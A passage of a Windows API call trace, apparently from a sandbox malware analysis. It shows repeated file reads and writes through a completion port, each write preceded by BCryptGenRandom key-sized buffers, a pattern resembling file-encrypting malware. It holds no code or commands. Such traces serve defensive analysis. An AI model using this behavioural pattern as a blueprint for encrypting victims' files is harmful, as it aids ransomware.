nNumberOfBytesToWrite=0x2650, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0161.583] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0161.626] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x16d3, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0161.627] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0161.637] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.638] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.638] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0161.638] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.639] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.639] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0161.639] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0161.639] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0161.639] free (_Block=0x3e305b8) [0161.639] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0161.639] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0161.640] free (_Block=0x1fa91d0) [0161.640] free (_Block=0x1fa2ed8) [0161.640] free (_Block=0x1fa90b8) [0161.640] WriteFile (in: hFile=0x308, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0161.640] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0161.651] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.652] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.652] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0161.652] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.653] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.653] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0161.653] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0161.653] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0161.653] free (_Block=0x3e305b8) [0161.653] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0161.653] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0161.654] free (_Block=0x1fa91d0) [0161.654] free (_Block=0x1fa2ed8) [0161.654] free (_Block=0x1fa90b8) [0161.654] WriteFile (in: hFile=0x338, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0161.654] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0161.663] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.664] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.664] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0161.664] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.664] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.664] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0161.665] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0161.665] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0161.665] free (_Block=0x3e305b8) [0161.665] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0161.665] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0161.665] free (_Block=0x1fa91d0) [0161.665] free (_Block=0x1fa2ed8) [0161.665] free (_Block=0x1fa90b8) [0161.665] WriteFile (in: hFile=0x3cc, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0161.666] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0161.670] CloseHandle (hObject=0x308) returned 1 [0161.670] free (_Block=0x1ff1e60) [0161.670] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0161.671] CloseHandle (hObject=0x338) returned 1 [0161.671] free (_Block=0x3d70450) [0161.671] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0161.682] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.682] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.683] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0161.683] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.683] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.683] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0161.683] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0161.683] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0161.683] free (_Block=0x3e305b8) [0161.683] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0161.684] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0161.684] free (_Block=0x1fa91d0) [0161.684] free (_Block=0x1fa2ed8) [0161.684] free (_Block=0x1fa90b8) [0161.684] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0161.684] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0161.696] CloseHandle (hObject=0x3cc) returned 1 [0161.696] free (_Block=0x3f70048) [0161.696] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0161.710] ReadFile (in: hFile=0x338, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x5044, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0161.719] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0161.728] ReadFile (in: hFile=0x3cc, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0xeaa, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 0x0 [0161.728] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0161.739] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.740] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.740] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0161.740] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.740] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.740] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0161.741] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0161.741] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0161.741] free (_Block=0x3e305b8) [0161.741] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0161.741] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0161.741] free (_Block=0x1fa91d0) [0161.741] free (_Block=0x1fa2ed8) [0161.741] free (_Block=0x1fa90b8) [0161.741] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0161.742] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0161.751] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.751] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.751] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0161.751] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.752] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.752] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0161.752] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0161.752] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0161.752] free (_Block=0x3e305b8) [0161.752] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0161.752] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0161.753] free (_Block=0x1fa91d0) [0161.753] free (_Block=0x1fa2ed8) [0161.753] free (_Block=0x1fa90b8) [0161.753] WriteFile (in: hFile=0x2a8, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0161.754] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0161.755] WriteFile (in: hFile=0x2a8, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x1390, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0161.755] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0161.779] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x864, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0161.779] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0161.786] ReadFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x1172, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0161.796] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0161.810] ReadFile (in: hFile=0x3cc, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x20ca, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0161.820] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0161.828] ReadFile (in: hFile=0x308, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x21ec, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 0x0 [0161.843] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0161.860] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.861] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.861] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0161.861] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.861] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.861] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0161.861] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0161.861] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0161.862] free (_Block=0x3e305b8) [0161.862] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0161.862] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0161.862] free (_Block=0x1fa91d0) [0161.862] free (_Block=0x1fa2ed8) [0161.862] free (_Block=0x1fa90b8) [0161.862] WriteFile (in: hFile=0x338, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0161.862] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0161.864] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.865] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.865] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0161.865] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.865] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.866] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0161.866] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0161.866] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0161.866] free (_Block=0x3e305b8) [0161.866] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0161.866] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0161.866] free (_Block=0x1fa91d0) [0161.867] free (_Block=0x77d7a8) [0161.867] free (_Block=0x1fa90b8) [0161.867] WriteFile (in: hFile=0x3cc, lpBuffer=0x3d70484, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 0x0 [0161.867] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0161.877] ReadFile (in: hFile=0x3cc, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x38c6, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0161.889] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0161.892] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x173e, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0161.893] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0161.893] CloseHandle (hObject=0x2a8) returned 1 [0161.893] free (_Block=0x3df0008) [0161.893] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0161.895] CloseHandle (hObject=0x308) returned 1 [0161.895] free (_Block=0x3f70048) [0161.895] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0161.898] ReadFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x4696, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0161.899] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0161.912] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x2f38, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0161.913] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0161.914] CloseHandle (hObject=0x2a4) returned 1 [0161.914] free (_Block=0x3df0008) [0161.914] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0161.930] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.931] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.931] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0161.931] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.931] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.931] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0161.943] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0161.943] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0161.943] free (_Block=0x3e305b8) [0161.943] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0161.943] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0161.944] free (_Block=0x1fa91d0) [0161.944] free (_Block=0x1fa2ed8) [0161.944] free (_Block=0x1fa90b8) [0161.944] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0161.944] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0161.945] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x14c0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0161.945] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0161.958] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1580, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0161.959] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0161.959] CloseHandle (hObject=0x2a4) returned 1 [0161.960] free (_Block=0x3df0008) [0161.960] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0161.969] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.970] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.970] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0161.970] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.970] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.970] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0161.971] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0161.971] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0161.971] free (_Block=0x3e305b8) [0161.971] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0161.971] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0161.971] free (_Block=0x1fa91d0) [0161.971] free (_Block=0x1fa2ed8) [0161.971] free 